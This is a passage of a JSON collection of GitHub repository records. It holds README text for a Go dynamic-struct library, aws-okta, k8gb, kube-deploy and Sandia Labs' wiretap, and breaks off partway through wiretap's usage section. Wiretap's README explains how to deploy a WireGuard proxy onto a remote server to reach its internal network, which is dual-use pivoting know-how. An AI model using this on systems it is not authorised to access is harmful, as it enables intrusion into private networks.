`json:\"-\"`).\n\t\tBuild().\n\t\tNew()\n\n\tdata := []byte(`\n{\n \"int\": 123,\n \"someText\": \"example\",\n \"double\": 123.45,\n \"Boolean\": true,\n \"Slice\": [1, 2, 3],\n \"Anonymous\": \"avoid to read\"\n}\n`)\n\n\terr := json.Unmarshal(data, &instance)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tdata, err = json.Marshal(instance)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tfmt.Println(string(data))\n\t// Out:\n\t// {\"int\":123,\"someText\":\"example\",\"double\":123.45,\"Boolean\":true,\"Slice\":[1,2,3]}\n}\n```\n\n## Extend existing struct\n```go\npackage main\n\nimport (\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"log\"\n\n\t\"github.com/ompluscator/dynamic-struct\"\n)\n\ntype Data struct {\n\tInteger int `json:\"int\"`\n}\n\nfunc main() {\n\tinstance := dynamicstruct.ExtendStruct(Data{}).\n\t\tAddField(\"Text\", \"\", `json:\"someText\"`).\n\t\tAddField(\"Float\", 0.0, `json:\"double\"`).\n\t\tAddField(\"Boolean\", false, \"\").\n\t\tAddField(\"Slice\", []int{}, \"\").\n\t\tAddField(\"Anonymous\", \"\", `json:\"-\"`).\n\t\tBuild().\n\t\tNew()\n\n\tdata := []byte(`\n{\n \"int\": 123,\n \"someText\": \"example\",\n \"double\": 123.45,\n \"Boolean\": true,\n \"Slice\": [1, 2, 3],\n \"Anonymous\": \"avoid to read\"\n}\n`)\n\n\terr := json.Unmarshal(data, &instance)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tdata, err = json.Marshal(instance)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tfmt.Println(string(data))\n\t// Out:\n\t// {\"int\":123,\"someText\":\"example\",\"double\":123.45,\"Boolean\":true,\"Slice\":[1,2,3]}\n}\n```\n\n## Merge existing structs\n```go\npackage main\n\nimport (\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"log\"\n\n\t\"github.com/ompluscator/dynamic-struct\"\n)\n\ntype DataOne struct {\n\tInteger int `json:\"int\"`\n\tText string `json:\"someText\"`\n\tFloat float64 `json:\"double\"`\n}\n\ntype DataTwo struct {\n\tBoolean bool\n\tSlice []int\n\tAnonymous string `json:\"-\"`\n}\n\nfunc main() {\n\tinstance := dynamicstruct.MergeStructs(DataOne{}, DataTwo{}).\n\t\tBuild().\n\t\tNew()\n\n\tdata := []byte(`\n{\n\"int\": 123,\n\"someText\": \"example\",\n\"double\": 123.45,\n\"Boolean\": true,\n\"Slice\": [1, 2, 3],\n\"Anonymous\": \"avoid to read\"\n}\n`)\n\n\terr := json.Unmarshal(data, &instance)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tdata, err = json.Marshal(instance)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tfmt.Println(string(data))\n\t// Out:\n\t// {\"int\":123,\"someText\":\"example\",\"double\":123.45,\"Boolean\":true,\"Slice\":[1,2,3]}\n}\n```\n\n## Read dynamic struct\n\n```go\npackage main\n\nimport (\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"log\"\n\n\t\"github.com/ompluscator/dynamic-struct\"\n)\n\ntype DataOne struct {\n\tInteger int `json:\"int\"`\n\tText string `json:\"someText\"`\n\tFloat float64 `json:\"double\"`\n}\n\ntype DataTwo struct {\n\tBoolean bool\n\tSlice []int\n\tAnonymous string `json:\"-\"`\n}\n\nfunc main() {\n\tinstance := dynamicstruct.MergeStructs(DataOne{}, DataTwo{}).\n\t\tBuild().\n\t\tNew()\n\n\tdata := []byte(`\n{\n\"int\": 123,\n\"someText\": \"example\",\n\"double\": 123.45,\n\"Boolean\": true,\n\"Slice\": [1, 2, 3],\n\"Anonymous\": \"avoid to read\"\n}\n`)\n\n\terr := json.Unmarshal(data, &instance)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\treader := dynamicstruct.NewReader(instance)\n\n\tfmt.Println(\"Integer\", reader.GetField(\"Integer\").Int())\n\tfmt.Println(\"Text\", reader.GetField(\"Text\").String())\n\tfmt.Println(\"Float\", reader.GetField(\"Float\").Float64())\n\tfmt.Println(\"Boolean\", reader.GetField(\"Boolean\").Bool())\n\tfmt.Println(\"Slice\", reader.GetField(\"Slice\").Interface().([]int))\n\tfmt.Println(\"Anonymous\", reader.GetField(\"Anonymous\").String())\n\n\tvar dataOne DataOne\n\terr = reader.ToStruct(&dataOne)\n\tfmt.Println(err, dataOne)\n\n\tvar dataTwo DataTwo\n\terr = reader.ToStruct(&dataTwo)\n\tfmt.Println(err, dataTwo)\n\t// Out:\n\t// Integer 123\n\t// Text example\n\t// Float 123.45\n\t// Boolean true\n\t// Slice [1 2 3]\n\t// Anonymous\n\t// {123 example 123.45}\n\t// {true [1 2 3] }\n}\n```\n\n## Make a slice of dynamic struct\n\n```go\npackage main\n\nimport (\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"log\"\n\n\t\"github.com/ompluscator/dynamic-struct\"\n)\n\ntype Data struct {\n\tInteger int `json:\"int\"`\n\tText string `json:\"someText\"`\n\tFloat float64 `json:\"double\"`\n\tBoolean bool\n\tSlice []int\n\tAnonymous string `json:\"-\"`\n}\n\nfunc main() {\n\tdefinition := dynamicstruct.ExtendStruct(Data{}).Build()\n\n\tslice := definition.NewSliceOfStructs()\n\n\tdata := []byte(`\n[\n\t{\n\t\t\"int\": 123,\n\t\t\"someText\": \"example\",\n\t\t\"double\": 123.45,\n\t\t\"Boolean\": true,\n\t\t\"Slice\": [1, 2, 3],\n\t\t\"Anonymous\": \"avoid to read\"\n\t}\n]\n`)\n\n\terr := json.Unmarshal(data, &slice)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tdata, err = json.Marshal(slice)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tfmt.Println(string(data))\n\t// Out:\n\t// [{\"Boolean\":true,\"Slice\":[1,2,3],\"int\":123,\"someText\":\"example\",\"double\":123.45}]\n\n\treader := dynamicstruct.NewReader(slice)\n\treadersSlice := reader.ToSliceOfReaders()\n\tfor k, v := range readersSlice {\n\t\tvar value Data\n\t\terr := v.ToStruct(&value)\n\t\tif err != nil {\n\t\t\tlog.Fatal(err)\n\t\t}\n\n\t\tfmt.Println(k, value)\n\t}\n\t// Out:\n\t// 0 {123 example 123.45 true [1 2 3] }\n}\n\n```\n\n## Make a map of dynamic struct\n\n```go\npackage main\n\nimport (\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"log\"\n\n\t\"github.com/ompluscator/dynamic-struct\"\n)\n\ntype Data struct {\n\tInteger int `json:\"int\"`\n\tText string `json:\"someText\"`\n\tFloat float64 `json:\"double\"`\n\tBoolean bool\n\tSlice []int\n\tAnonymous string `json:\"-\"`\n}\n\nfunc main() {\n\tdefinition := dynamicstruct.ExtendStruct(Data{}).Build()\n\n\tmapWithStringKey := definition.NewMapOfStructs(\"\")\n\n\tdata := []byte(`\n{\n\t\"element\": {\n\t\t\"int\": 123,\n\t\t\"someText\": \"example\",\n\t\t\"double\": 123.45,\n\t\t\"Boolean\": true,\n\t\t\"Slice\": [1, 2, 3],\n\t\t\"Anonymous\": \"avoid to read\"\n\t}\n}\n`)\n\n\terr := json.Unmarshal(data, &mapWithStringKey)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tdata, err = json.Marshal(mapWithStringKey)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tfmt.Println(string(data))\n\t// Out:\n\t// {\"element\":{\"int\":123,\"someText\":\"example\",\"double\":123.45,\"Boolean\":true,\"Slice\":[1,2,3]}}\n\n\treader := dynamicstruct.NewReader(mapWithStringKey)\n\treadersMap := reader.ToMapReaderOfReaders()\n\tfor k, v := range readersMap {\n\t\tvar value Data\n\t\terr := v.ToStruct(&value)\n\t\tif err != nil {\n\t\t\tlog.Fatal(err)\n\t\t}\n\n\t\tfmt.Println(k, value)\n\t}\n\t// Out:\n\t// element {123 example 123.45 true [1 2 3] }\n}\n\n```", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "segmentio/aws-okta", "link": "https://github.com/segmentio/aws-okta", "tags": [], "stars": 538, "description": "aws-vault like tool for Okta authentication", "lang": "Go", "repo_lang": "", "readme": "# aws-okta\n\n`aws-okta` allows you to authenticate with AWS using your Okta credentials.\n\n\u26a0\ufe0f As per [#278](https://github.com/segmentio/aws-okta/issues/278), development and maintenance of `aws-okta` is halted. If you're not already using it, now would be a bad time to start. \u26a0\ufe0f\n\n## Installing\n\n[See the wiki for more installation options.](https://github.com/segmentio/aws-okta/wiki/Installation)\n\n### MacOS\n\nYou can install with `brew`:\n\n```bash\n$ brew install aws-okta\n```\n\nShout-out to the fine maintainers of [the core formula](https://github.com/Homebrew/homebrew-core/blob/master/Formula/aws-okta.rb).\n\n### Linux\n\n[Download a binary from our release page](https://github.com/segmentio/aws-okta/releases), or [see the wiki for more installation options like deb/rpm packages](https://github.com/segmentio/aws-okta/wiki/Installation).\n\n### Windows\n\nSee [docs/windows.md](docs/windows.md) for information on getting this working with Windows.\n\n## Usage\n\n### Adding Okta credentials\n\n```bash\n$ aws-okta add\n```\n\nThis will prompt you for your Okta organization, custom domain, region, username, and password. These credentials will then be stored in your keyring for future use.\n\n### Exec\n\n```bash\n$ aws-okta exec -- \n```\n\nExec will assume the role specified by the given aws config profile and execute a command with the proper environment variables set. This command is a drop-in replacement for `aws-vault exec` and accepts all of the same command line flags:\n\n```bash\n$ aws-okta help exec\nexec will run the command specified with aws credentials set in the environment\n\nUsage:\n aws-okta exec -- \n\nFlags:\n -a, --assume-role-ttl duration Expiration time for assumed role (default 1h0m0s)\n -h, --help help for exec\n -t, --session-ttl duration Expiration time for okta role session (default 1h0m0s)\n\nGlobal Flags:\n -b, --backend string Secret backend to use [kwallet secret-service file] (default \"file\")\n -d, --debug Enable debug logging\n```\n\n### Exec for EKS and Kubernetes\n\n`aws-okta` can also be used to authenticate `kubectl` to your AWS EKS cluster. Assuming you have [installed `kubectl`](https://docs.aws.amazon.com/eks/latest/userguide/install-kubectl.html), [setup your kubeconfig](https://docs.aws.amazon.com/eks/latest/userguide/create-kubeconfig.html) and [installed `aws-iam-authenticator`](https://docs.aws.amazon.com/eks/latest/userguide/configure-kubectl.html), you can now access your EKS cluster with `kubectl`. Note that on a new cluster, your Okta CLI user needs to be using the same assumed role as the one who created the cluster. Otherwise, your cluster needs to have been configured to allow your assumed role.\n\n```bash\n$ aws-okta exec -- kubectl version --short\n```\n\nLikewise, most Kubernetes projects should work, like Helm and Ark.\n\n```bash\n$ aws-okta exec -- helm version --short\n```\n\n### Configuring your aws config\n\n`aws-okta` assumes that your base role is one that has been configured for Okta's SAML integration by your Okta admin. Okta provides a guide for setting up that integration [here](https://support.okta.com/help/servlet/fileField?retURL=%2Fhelp%2Farticles%2FKnowledge_Article%2FAmazon-Web-Services-and-Okta-Integration-Guide&entityId=ka0F0000000MeyyIAC&field=File_Attachment__Body__s). During that configuration, your admin should be able to grab the AWS App Embed URL from the General tab of the AWS application in your Okta org. You will need to set that value in your `~/.aws/config` file, for example:\n\n```ini\n[okta]\naws_saml_url = home/amazon_aws/0ac4qfegf372HSvKF6a3/965\n```\n\nNext, you need to set up your base Okta role. This will be one your admin created while setting up the integration. It should be specified like any other aws profile:\n\n```ini\n[profile okta-dev]\nrole_arn = arn:aws:iam:::role/\nregion = \n```\n\nYour setup may require additional roles to be configured if your admin has set up a more complicated role scheme like cross account roles. For more details on the authentication process, see the internals section.\n\n#### A more complex example\n\nThe `aws_saml_url` can be set in the \"okta\" ini section, or on a per profile basis. This is useful if, for example, your organization has several Okta Apps (i.e. one for dev/qa and one for prod, or one for internal use and one for integrations with third party providers). For example:\n\n```ini\n[okta]\n# This is the \"default\" Okta App\naws_saml_url = home/amazon_aws/cuZGoka9dAIFcyG0UllG/214\n\n[profile dev]\n# This profile uses the default Okta app\nrole_arn = arn:aws:iam:::role/\n\n[profile integrations-auth]\n# This is a distinct Okta App\naws_saml_url = home/amazon_aws/woezQTbGWUaLSrYDvINU/214\nrole_arn = arn:aws:iam:::role/\n\n[profile vendor]\n# This profile uses the \"integrations-auth\" Okta app combined with secondary role assumption\nsource_profile = integrations-auth\nrole_arn = arn:aws:iam:::role/\n\n[profile testaccount]\n# This stores the Okta session in a separate item in the Keyring.\n# This is useful if the Okta session is used or modified by other applications\n# and needs to be isolated from other sessions. It is also useful for\n# development versions or multiple versions of aws-okta running.\nokta_session_cookie_key = okta-session-cookie-test\nrole_arn = arn:aws:iam:::role/\n```\n\nThe configuration above means that you can use multiple Okta Apps at the same time and switch between them easily.\n\n#### Multiple Okta accounts\nsetup accounts:\n```ini\naws-okta add --account=account-a\naws-okta add --account=account-b\n```\n\ndefine keyring key for each profile:\n```ini\n[profile account-a]\n# This is a distinct Okta App\naws_saml_url = home/amazon_aws/woezQTbGWUaLSrYDvINU/214\nrole_arn = arn:aws:iam:::role/\nokta_account_name = account-a\n\n[profile account-b]\naws_saml_url = home/amazon_aws/woezQTbGaDAA4rYDvINU/123\nrole_arn = arn:aws:iam:::role/\nokta_account_name = account-b\n```\n\n#### Configuring Okta assume role and AWS assume role TTLs\n\nThe default TTLs for both the initial SAML assumed role and secondary AWS assumed roles are 1 hour. This means that AWS credentials will expire every hour.\n\n* *session-ttl*: Duration of initial role assumed by Okta\n* *assume-role-ttl*: Duration of second role assumed\n\nIn addition to specifying session and AWS assume role TTLs with command-line flags, they can be set using environment variables.\n\n```bash\nexport AWS_SESSION_TTL=1h\nexport AWS_ASSUME_ROLE_TTL=1h\n```\n\nThe AWS assume role TTL can also be set per-profile in the aws config:\n\n```ini\n# Example with an initial and secondary role that are configured with a max session duration of 12 hours\n[profile ttldemo]\naws_saml_url = home/amazon_aws/cuZGoka9dAIFcyG0UllG/214\nrole_arn = arn:aws:iam:::role/\nsession_ttl = 12h\n\n[profile ttldemo-role]\nsource_profile = ttldemo\nrole_arn = arn:aws:iam:::role/\nassume_role_ttl = 12h\n```\n\n#### Multi-factor Authentication (MFA) configuration\n\nIf you have a single MFA factor configured, that factor will be automatically selected. By default, if you have multiple available MFA factors, then you will be prompted to select which one to use. However, if you have multiple factors and want to specify which factor to use, you can do one of the following:\n\n* Specify on the command line with `--mfa-provider` and `--mfa-factor-type`\n* Specify with environment variables `AWS_OKTA_MFA_PROVIDER` and `AWS_OKTA_MFA_FACTOR_TYPE`\n* Specify in your aws config with `mfa_provider` and `mfa_factor_type`\n\n### Shell completion\n\n`aws-okta` provides shell completion support for BASH and ZSH via the `aws-okta completion` command.\n\n## Backends\n\nWe use 99design's keyring package that they use in `aws-vault`. Because of this, you can choose between different pluggable secret storage backends just like in `aws-vault`. You can either set your backend from the command line as a flag, or set the `AWS_OKTA_BACKEND` environment variable.\n\nFor Linux / Ubuntu add the following to your bash config / zshrc etc:\n```\nexport AWS_OKTA_BACKEND=secret-service\n```\n\n## --session-cache-single-item aka AWS_OKTA_SESSION_CACHE_SINGLE_ITEM (alpha)\n\nThis flag enables a new secure session cache that stores all sessions in the same keyring item. For macOS users, this means drastically fewer authorization prompts when upgrading or running local builds.\n\nNo provision is made to migrate sessions between session caches.\n\nImplemented in [https://github.com/segmentio/aws-okta/issues/146](#146).\n\n## Local Development\n\nIf you're developing in Linux, you'll need to get `libusb`. For Ubuntu, install the libusb-1.0-0-dev or use the `Dockerfile` provided in the repo.\n\n## Running Tests\n\n`make test`\n\n## Releasing\n\nPushing a new tag will cause Circle to automatically create and push a linux release. After this is done, you should run (from a mac):\n\n```bash\n$ export CIRCLE_TAG=`git describe --tags`\n$ make release-mac\n```\n\n## Analytics\n\n`aws-okta` includes some usage analytics code which Segment uses internally for tracking usage of internal tools. This analytics code is turned off by default, and can only be enabled via a linker flag at build time, which we do not set for public github releases.\n\n## Internals\n\n### Authentication process\n\nWe use the following multiple step authentication:\n\n- Step 1 : Basic authentication against Okta\n- Step 2 : MFA challenge if required\n- Step 3 : Get AWS SAML assertion from Okta\n- Step 4 : Assume base okta role from profile with the SAML Assertion\n- Step 5 : Assume the requested AWS Role from the targeted AWS account to generate STS credentials\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "k8gb-io/k8gb", "link": "https://github.com/k8gb-io/k8gb", "tags": ["gslb", "kubernetes-operator", "k8s", "cloud-native", "balancer", "kubernetes-global-balancer", "kubernetes-services", "dns-lb", "dns-lb-service", "kubernetes", "kubernetes-controller", "hacktoberfest", "cncf"], "stars": 538, "description": "A cloud native Kubernetes Global Balancer", "lang": "Go", "repo_lang": "", "readme": "

\n\n

\n

K8GB - Kubernetes Global Balancer

\n

CNCF Sandbox Project

\n

Roadmap

\n

Join #k8gb on CNCF Slack

\n\n[![License: MIT](https://img.shields.io/badge/License-Apache_2.0-yellow.svg)](https://opensource.org/licenses/Apache-2.0)\n[![Build Status](https://github.com/k8gb-io/k8gb/workflows/Golang%20lint,%20golic,%20gokart%20and%20test/badge.svg?branch=master)](https://github.com/k8gb-io/k8gb/actions?query=workflow%3A%22Golang%20lint,%20golic,%20gokart%20and%20test%22+branch%3Amaster)\n[![Terratest Status](https://github.com/k8gb-io/k8gb/workflows/Terratest/badge.svg?branch=master)](https://github.com/k8gb-io/k8gb/actions?query=workflow%3ATerratest+branch%3Amaster)\n[![Gosec](https://github.com/k8gb-io/k8gb/workflows/Gosec/badge.svg?branch=master)](https://github.com/k8gb-io/k8gb/actions?query=workflow%3AGosec+branch%3Amaster)\n[![CodeQL](https://github.com/k8gb-io/k8gb/workflows/CodeQL/badge.svg?branch=master)](https://github.com/k8gb-io/k8gb/actions?query=workflow%3ACodeQL+branch%3Amaster)\n[![Go Report Card](https://goreportcard.com/badge/github.com/k8gb-io/k8gb)](https://goreportcard.com/report/github.com/k8gb-io/k8gb)\n[![Helm Publish](https://github.com/k8gb-io/k8gb/actions/workflows/helm_publish.yaml/badge.svg)](https://github.com/k8gb-io/k8gb/actions/workflows/helm_publish.yaml)\n[![KubeLinter](https://github.com/k8gb-io/k8gb/workflows/KubeLinter/badge.svg?branch=master)](https://github.com/k8gb-io/k8gb/actions?query=workflow%3AKubeLinter+branch%3Amaster)\n[![Docker Pulls](https://img.shields.io/docker/pulls/absaoss/k8gb)](https://hub.docker.com/r/absaoss/k8gb)\n[![Artifact HUB](https://img.shields.io/endpoint?url=https://artifacthub.io/badge/repository/k8gb)](https://artifacthub.io/packages/search?repo=k8gb)\n[![doc.crds.dev](https://img.shields.io/badge/doc-crds-purple)](https://doc.crds.dev/github.com/k8gb-io/k8gb)\n[![FOSSA Status](https://app.fossa.com/api/projects/custom%2B162%2Fgithub.com%2Fk8gb-io%2Fk8gb.svg?type=shield)](https://app.fossa.com/projects/custom%2B162%2Fgithub.com%2Fk8gb-io%2Fk8gb?ref=badge_shield)\n[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/4866/badge)](https://bestpractices.coreinfrastructure.org/projects/4866)\n[![CLOMonitor](https://img.shields.io/endpoint?url=https://clomonitor.io/api/projects/cncf/k8gb/badge)](https://clomonitor.io/projects/cncf/k8gb)\n\nA Global Service Load Balancing solution with a focus on having cloud native qualities and work natively in a Kubernetes context.\n\nJust a single Gslb CRD to enable the Global Load Balancing:\n\n```yaml\napiVersion: k8gb.absa.oss/v1beta1\nkind: Gslb\nmetadata:\n name: test-gslb-failover\n namespace: test-gslb\nspec:\n ingress:\n ingressClassName: nginx # or any other existing ingressclasses.networking.k8s.io\n rules:\n - host: failover.test.k8gb.io # Desired GSLB enabled FQDN\n http:\n paths:\n - path: /\n pathType: Prefix\n backend:\n service:\n name: frontend-podinfo # Service name to enable GSLB for\n port:\n name: http\n strategy:\n type: failover # Global load balancing strategy\n primaryGeoTag: eu-west-1 # Primary cluster geo tag\n```\n\n[Global load balancing](https://cloud.redhat.com/blog/global-load-balancer-approaches), commonly referred to as GSLB (Global Server Load Balancing) solutions, has been typically the domain of proprietary network software and hardware vendors and installed and managed by siloed network teams.\n\nk8gb is a completely open source, cloud native, global load balancing solution for Kubernetes.\n\nk8gb focuses on load balancing traffic across geographically dispersed Kubernetes clusters using multiple load balancing [strategies](./docs/strategy.md) to meet requirements such as region failover for high availability.\n\nGlobal load balancing for any Kubernetes Service can now be enabled and managed by any operations or development teams in the same Kubernetes native way as any other custom resource.\n\n## Key Differentiators\n\n* Load balancing is based on timeproof DNS protocol which is perfect for global scope and extremely reliable\n* No dedicated management cluster and no single point of failure\n* Kubernetes native application health checks utilizing status of Liveness and Readiness probes for load balancing decisions\n* Configuration with a single Kubernetes CRD of Gslb kind\n\n## Quick Start\n\nSimply run\n\n```sh\nmake deploy-full-local-setup\n```\n\nIt will deploy two local [k3s](https://k3s.io/) clusters via [k3d](https://k3d.io/), [expose associated CoreDNS service for UDP DNS traffic](./docs/exposing_dns.md)), and install k8gb with test applications and two sample Gslb resources on top.\n\nThis setup is adapted for local scenarios and works without external DNS provider dependency.\n\nConsult with [local playground](/docs/local.md) documentation to learn all the details of experimenting with local setup.\n\nOptionally, you can run `make deploy-prometheus` and check the metrics on the test clusters (http://localhost:9080, http://localhost:9081).\n\n## Motivation and Architecture\n\nk8gb was born out of the need for an open source, cloud native GSLB solution at Absa Group in South Africa.\n\nAs part of the bank's wider container adoption running multiple, geographically dispersed Kubernetes clusters, the need for a global load balancer that was driven from the health of Kubernetes Services was required and for which there did not seem to be an existing solution.\n\nYes, there are proprietary network software and hardware vendors with GSLB solutions and products, however, these were costly, heavyweight in terms of complexity and adoption, and were not Kubernetes native in most cases, requiring dedicated hardware or software to be run outside of Kubernetes.\n\nThis was the problem we set out to solve with k8gb.\n\nBorn as a completely open source project and following the popular Kubernetes operator pattern, k8gb can be installed in a Kubernetes cluster and via a Gslb custom resource, can provide independent GSLB capability to any Ingress or Service in the cluster, without the need for handoffs and coordination between dedicated network teams.\n\nk8gb commoditizes GSLB for Kubernetes, putting teams in complete control of exposing Services across geographically dispersed Kubernetes clusters across public and private clouds.\n\nk8gb requires no specialized software or hardware, relying completely on other OSS/CNCF projects, has no single point of failure, and fits in with any existing Kubernetes deployment workflow (e.g. GitOps, Kustomize, Helm, etc.) or tools.\n\nPlease see the extended architecture documentation [here](/docs/index.md)\n\nInternal k8gb architecture and its components are described [here](/docs/components.md)\n\n## Installation and Configuration Tutorials\n\n* [General deployment with Infoblox integration](/docs/deploy_infoblox.md)\n* [AWS based deployment with Route53 integration](/docs/deploy_route53.md)\n* [AWS based deployment with NS1 integration](/docs/deploy_ns1.md)\n* [Local playground for testing and development](/docs/local.md)\n* [Local playground with Kuar web app](/docs/local-kuar.md)\n* [Metrics](/docs/metrics.md)\n* [Traces](/docs/traces.md)\n* [Ingress annotations](/docs/ingress_annotations.md)\n* [Integration with Admiralty](/docs/admiralty.md)\n* [Integration with Liqo](/docs/liqo.md)\n\n## Production Readiness\n\nk8gb is very well tested with the following environment options\n\n| Type | Implementation |\n|----------------------------------|------------------------------------------------------------------------------|\n| Kubernetes Version | for k8s `< 1.19` use k8gb `<= 0.8.8`; since k8s `1.19` use `0.9.0` or newer |\n| Environment | Self-managed, AWS(EKS) [*](#clarify) |\n| Ingress Controller | NGINX, AWS Load Balancer Controller [*](#clarify) |\n| EdgeDNS | Infoblox, Route53, NS1 |\n\n* We only mention solutions where we have tested and verified a k8gb installation.\nIf your Kubernetes version or Ingress controller is not included in the table above, it does not mean that k8gb will not work for you. k8gb is architected to run on top of any compliant Kubernetes cluster and Ingress controller.\n\n## Presentations Featuring k8gb\n\n[//]: # (Table is generated with the help of https://www.tablesgenerator.com/markdown_tables#)\n\n| **KubeCon NA 2021**
[![](https://img.youtube.com/vi/-lkKZRdv81A/0.jpg)](https://www.youtube.com/watch?v=-lkKZRdv81A \"KubeCon NA 2021: Cloud Native Global Load Balancer for Kubernetes\") | **FOSDEM 2022**
[![](https://img.youtube.com/vi/1UTWxf7PQis/0.jpg)](https://www.youtube.com/watch?v=1UTWxf7PQis \"FOSDEM 2022: Cloud Native Global Load Balancer for Kubernetes\") |\n|---|---|\n| **NS1 INS1GHTS**
[![](https://img.youtube.com/vi/T_4EiAqwevI/0.jpg)](https://www.youtube.com/watch?v=T_4EiAqwevI \"INS1GHTS: Cloud Native Global Load Balancer for Kubernetes\") | **Crossplane Community Day**
[![](https://img.youtube.com/vi/5l4Xf_Q8ybY/0.jpg)](https://www.youtube.com/watch?v=5l4Xf_Q8ybY \"Crossplane Community Day Europe: Scaling Kubernetes Global Balancer with Crossplane\") |\n| **#29 DoK Community**
[![](https://img.youtube.com/vi/MluFlwPFZws/hqdefault.jpg)](https://www.youtube.com/watch?v=MluFlwPFZws \"#29 DoK Community: How Absa Developed Cloud Native Global Load Balancer for Kubernetes\") | **AWS Containers from the Couch show**
[![](https://img.youtube.com/vi/5pe3ezSnVI8/hqdefault.jpg)](https://www.youtube.com/watch?v=5pe3ezSnVI8 \"AWS Containers from the Couch\") |\n| **OpenShift Commons Briefings**
[![](https://img.youtube.com/vi/5DhO9C2NCrk/0.jpg)](https://www.youtube.com/watch?v=5DhO9C2NCrk \"OpenShift Commons Briefings\") | **Demo at Kubernetes SIG Multicluster**
[![](https://img.youtube.com/vi/jeUeRQM-ZyM/0.jpg)](https://www.youtube.com/watch?v=jeUeRQM-ZyM \"Kubernetes SIG Multicluster\") |\n\nYou can also find recordings from our community meetings at [k8gb youtube channel](https://www.youtube.com/channel/UCwvtktvdZu_pg-t-INvuW5g).\n\n## Contributing\n\nSee [CONTRIBUTING](/CONTRIBUTING.md)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kubernetes-retired/kube-deploy", "link": "https://github.com/kubernetes-retired/kube-deploy", "tags": ["k8s-sig-cluster-lifecycle"], "stars": 538, "description": "[EOL] A place for cluster deployment automation", "lang": "Go", "repo_lang": "", "readme": "# kube-deploy\n\nThis is a repository of community maintained Kubernetes cluster deployment\nautomations.\n\nThink of this as https://github.com/kubernetes/contrib for deployment\nautomations! Each subdirectory is its own project. It should be a place where\npeople can come see how the community is deploying kubernetes and should allow\nfor faster development iteration compared to developing in the main repository.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "sandialabs/wiretap", "link": "https://github.com/sandialabs/wiretap", "tags": ["golang", "infosec", "proxy", "snl-cyber-sec", "tunnel", "vpn", "wireguard"], "stars": 538, "description": "Wiretap is a transparent, VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.", "lang": "Go", "repo_lang": "", "readme": "
\n\n# Wiretap\n\nWiretap is a transparent, VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.\n
\n\nIn this diagram, the client has generated and installed a WireGuard configuration file that will route traffic destined for `10.0.0.0/24` through a WireGuard interface. Wiretap is then deployed to the server with a configuration that connects to the client as a WireGuard peer. The client can then interact with resources local to the server as if on the same network. \n\n
\n\n![Wiretap Diagram](media/Wiretap_Animated.svg)\n
\n\n## Quick Start\n\n1. Download binaries from the [releases](https://github.com/sandialabs/wiretap/releases) page, one for your client machine and one for your server (if different os/arch)\n2. Run `./wiretap configure --port --endpoint --routes ` with the appropriate arguments\n3. Import the resulting `wiretap.conf` file into WireGuard on the client machine\n4. Copy and paste the arguments output from the configure command into Wiretap on the server machine\n\n## Requirements\n\n### Client System\n\n* WireGuard - https://www.wireguard.com/install/\n* Privileged access to configure WireGuard\n\n### Server System\n\n* UDP access to client system's WireGuard endpoint (i.e., UDP traffic can be sent out and come back on at least one port)\n\nWhile not ideal, Wiretap can still work with outbound TCP instead of UDP. See the [TCP Tunneling](#tcp-tunneling) section for a step-by-step guide. \n\n## Installation\n\nGrab a binary from the [releases](https://github.com/sandialabs/wiretap/releases) page. You may want two binaries if the OS/ARCH are different on the client and server machines.\n\nIf you want to compile it yourself or can't find the OS/ARCH you're looking for, install Go (>=1.19) from https://go.dev/dl/ and use the provided [Makefile](./src/Makefile).\n\n## Usage\n\n### Configure\n\n
\n\n![Wiretap Configure Arguments](media/Wiretap_Configure.svg)\n
\n\nOn the client machine, run Wiretap in configure mode to build a config\n\n```bash\n./wiretap configure --port --endpoint --routes \n```\n\nFollowing the example in the diagram:\n```bash\n./wiretap configure --port 1337 --endpoint 1.3.3.7:1337 --routes 10.0.0.0/24\n```\n```\n\nConfiguration successfully generated.\nImport the config into WireGuard locally and pass the arguments below to Wiretap on the remote machine.\n\nconfig: wiretap.conf\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n[Interface]\nPrivateKey = qCvx4DBXqemoO8B7eRI2H9Em8zJn++rIBKO+F+ufQWE=\nAddress = 192.168.0.2/32\nAddress = fd::2/128\nListenPort = 1337\n\n[Peer]\nPublicKey = 6NxBlwJHujEFr5n9qvFAUyinj0l7Wadd/ZDQMCqTJAA=\nAllowedIPs = 10.0.0.0/24,a::/128\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\nargs: serve --private qGrU0juci5PLJ1ydSufE/UwlErL/bqfcz6uWil705UU= --public ZhRIAcGVwT7l9dhEXv7cvYKwLxOZJR4bgU4zePZaT04= --endpoint 